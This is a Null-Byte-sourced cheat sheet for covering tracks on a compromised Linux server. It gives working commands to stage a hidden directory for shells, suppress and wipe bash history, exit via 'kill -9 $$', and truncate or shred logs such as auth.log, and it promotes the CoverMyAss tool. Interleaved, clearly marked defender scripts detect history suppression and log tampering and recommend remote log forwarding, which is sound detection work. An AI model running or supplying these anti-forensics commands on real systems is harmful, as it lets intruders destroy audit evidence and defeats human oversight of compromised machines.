----------------------------------------------------------------------
_____ _
( _ ) _ ( )_
| (_) | ___ _ ___ _ _ ___ ___ (_)| ,_) _ _
| _ |/' _ `\ /'_`\ /' _ `\( ) ( )/' _ ` _ `\| || | ( ) ( )
| | | || ( ) |( (_) )| ( ) || (_) || ( ) ( ) || || |_ | (_) |
(_) (_)(_) (_)`\___/'(_) (_)`\__, |(_) (_) (_)(_)`\__)`\__, |
( )_| | ( )_| |
`\___/' `\___/'
A comprehensive guide on how to remove system presence on a
hacked linux machine / server. Source: Null-Byte
----------------------------------------------------------------------
CREATE SECRET DIRECTORY
----------------------------------------------------------------------
# Depending on privileges, search for all
# directory(s) you have rights to write to.
find / -perm -222 -type d 2>/dev/null
# Find a directory of choice and create a
# hidden sub-directory inside
mkdir /dev/shm/.secret
# To list directory content, use the command:
ls -l /dev/shm/.secret
# You can also use the below statement to
# view the hidden sub-directory(s)
ls -la /dev/shm/
# This hidden directory is designed to write code,
# upload modules, shells, etc. Once finished, you
# can delete it via...
rm -rf /dev/shm/.secret
----------------------------------------------------------------------
REMOVE BASH COMMAND HISTORY
----------------------------------------------------------------------
# You can use the 'history' command to view all
# statements and commands used in the current
# bash session. History is written to the file named by
# the HISTFILE environment variable, which is usually
# '~/.bash_history'. By typing...
echo $HISTFILE
# ...you can view where it is stored for certain.
# Unsetting HISTFILE stops the current session from
# saving its history to disk when the shell exits:
unset HISTFILE
# Alternatively, point HISTFILE at /dev/null so that
# nothing is written, using either of the statements below:
HISTFILE=/dev/null
export HISTFILE=/dev/null
# You can also set the number of commands kept in memory
# to zero by using either of the following statements:
HISTSIZE=0
export HISTSIZE=0
# ...or you can limit the number of lines allowed in the
# file. Both lines below can be utilized:
HISTFILESIZE=0
export HISTFILESIZE=0
# You may also want to disable history outright. This can be
# suspicious but is an alternative.
set +o history
# You can re-enable with the following command:
set -o history
# Additionally, you can use 'shopt -o' to toggle the same option:
shopt -ou history   # disable
shopt -os history   # enable
# To clear the history, you can input:
history -c
# ...then to write changes to disk, enter:
history -w
# 'history -c' will only be effective for the current
# session. To make sure history is cleared completely when
# exiting the shell, input:
cat /dev/null > ~/.bash_history && history -c && exit
# The 'kill' command will also let you exit the shell without
# saving history, because a SIGKILLed shell never runs its
# exit handling. Input as follows:
kill -9 $$
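For the defender, every setting listed above leaves a trace of its own. The following function is an added example, not part of the paste or the Null-Byte source: it scans a user's shell startup files for the history-suppression settings just described and reports whether the history file has been redirected to /dev/null. The home directory path and the startup file names it checks are assumptions; it runs on a stock Linux with grep and readlink.

```shell
# Defender-side check (added example): look for persistent history suppression
# in a user's shell startup files. Exit status 0 = nothing found, 1 = findings.
# Usage: audit_history_config /home/alice   (path is an assumed example)
audit_history_config() {
    home="$1"
    findings=0
    # Startup files checked are an assumption; add others your distro uses.
    for rc in "$home/.bashrc" "$home/.bash_profile" "$home/.profile" "$home/.bash_logout"; do
        [ -f "$rc" ] || continue
        # Patterns mirror the settings discussed above: HISTFILE pointed at
        # /dev/null or unset, HISTSIZE/HISTFILESIZE zeroed, history switched off.
        if grep -nE '(HISTFILE=/dev/null|unset HISTFILE|HISTSIZE=0([^0-9]|$)|HISTFILESIZE=0([^0-9]|$)|set [+]o history|shopt -ou history)' "$rc"; then
            echo "FINDING: history suppression configured in $rc"
            findings=$((findings + 1))
        fi
    done
    # A history file that is a symlink (typically to /dev/null) is a classic
    # persistent evasion; a real history file is a regular file.
    hist="$home/.bash_history"
    if [ -L "$hist" ]; then
        echo "FINDING: $hist is a symlink to $(readlink "$hist")"
        findings=$((findings + 1))
    fi
    [ "$findings" -eq 0 ]
}
```

This only catches settings that were made persistent; a value typed interactively (`HISTFILE=/dev/null` in a live session, `kill -9 $$`) never touches these files. The durable control is therefore not the shell's own history at all but an independent record the session cannot switch off: auditd execve logging or a process-level EDR sensor, shipped off the host.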
----------------------------------------------------------------------
CLEARING LOG FILES
----------------------------------------------------------------------
# Linux systems keep a variety of logs. Some common
# ones are:
# /var/log/auth.log   Authentication
# /var/log/cron.log   Cron Jobs
# /var/log/maillog    Mail
# /var/log/httpd      Apache
# You can remove a log w/ the 'rm' command. This however
# will likely raise suspicion. The more favorable choice is
# to clear the log without deleting the log file:
truncate -s 0 /var/log/<YOUR_LOG>
# Truncate is not always available on systems. If not, the
# same result can be accomplished by entering in any of the
# command statements below:
echo '' > /var/log/<YOUR_LOG>
> /var/log/<YOUR_LOG>
shred /var/log/<YOUR_LOG>
shred -zu /var/log/<YOUR_LOG>
cat /dev/null > /var/log/<YOUR_LOG>
true | tee /var/log/<YOUR_LOG>
dd if=/dev/null of=/var/log/<YOUR_LOG>
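Each of the clearing methods above leaves a measurable signature: the file shrinks, its existing bytes change in place (`shred` without `-u`), or the inode disappears or is replaced (`rm`, `shred -zu`). The following pair of functions is an added example, not part of the paste or the Null-Byte source: the first records a baseline of inode, size and a hash of the current contents for each log; the second re-checks and alerts on any of those three signatures while tolerating normal growth. It assumes GNU coreutils (`stat -c`, `sha256sum`) and log paths without spaces; the file names are examples.

```shell
# Defender-side log-tamper check (added example). Baseline format per line:
#   <path> <inode> <size> <sha256 of the first <size> bytes>
# Usage (paths are assumed examples):
#   record_log_baseline /var/lib/logwatch.base /var/log/auth.log /var/log/cron.log
#   check_log_baseline  /var/lib/logwatch.base    # exit 1 if anything was tampered
record_log_baseline() {
    baseline="$1"; shift
    : > "$baseline"
    for f in "$@"; do
        [ -e "$f" ] || continue
        inode=$(stat -c '%i' "$f")
        size=$(stat -c '%s' "$f")
        # Hash only the bytes that exist now, so later appends do not alert.
        hash=$(head -c "$size" "$f" | sha256sum | cut -d' ' -f1)
        printf '%s %s %s %s\n' "$f" "$inode" "$size" "$hash" >> "$baseline"
    done
}

check_log_baseline() {
    baseline="$1"
    tampered=0
    while read -r f old_inode old_size old_hash; do
        if [ ! -e "$f" ]; then
            echo "ALERT: $f missing (was inode $old_inode)"   # rm, shred -u
            tampered=$((tampered + 1)); continue
        fi
        new_inode=$(stat -c '%i' "$f")
        new_size=$(stat -c '%s' "$f")
        if [ "$new_inode" != "$old_inode" ]; then
            echo "ALERT: $f replaced (inode $old_inode -> $new_inode)"   # rm + recreate
            tampered=$((tampered + 1))
        elif [ "$new_size" -lt "$old_size" ]; then
            echo "ALERT: $f shrank ($old_size -> $new_size bytes)"   # truncate, > file, dd
            tampered=$((tampered + 1))
        else
            new_hash=$(head -c "$old_size" "$f" | sha256sum | cut -d' ' -f1)
            if [ "$new_hash" != "$old_hash" ]; then
                echo "ALERT: $f contents rewritten in place"   # shred without -u
                tampered=$((tampered + 1))
            fi
        fi
    done < "$baseline"
    [ "$tampered" -eq 0 ]
}
```

Log rotation also shrinks a file and changes its inode, so a real deployment compares against the rotation schedule or re-records the baseline from the rotate hook. More importantly, a baseline stored on the same host can be edited by the same attacker who edits the logs; the control that actually survives local clearing is forwarding (rsyslog or journald to a remote collector), with an auditd watch such as `-w /var/log/ -p wa -k log_tamper` to record who touched the local copies.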
----------------------------------------------------------------------
AUTOMATION OF PRESENCE REMOVAL
----------------------------------------------------------------------
# To automate secure deletion and removal of system presence, you
# are able to use CoverMyAss at: github.com/sundowndev/covermyass
# It utilizes 'wget' and will work as long as there's internet access.
# Find a writable directory, then use 'chmod' to make it executable:
chmod +x covermyass
# ...then execute it:
./covermyass
# In case of needing a quick exit, enter in:
./covermyass now
----------------------------------------------------------------------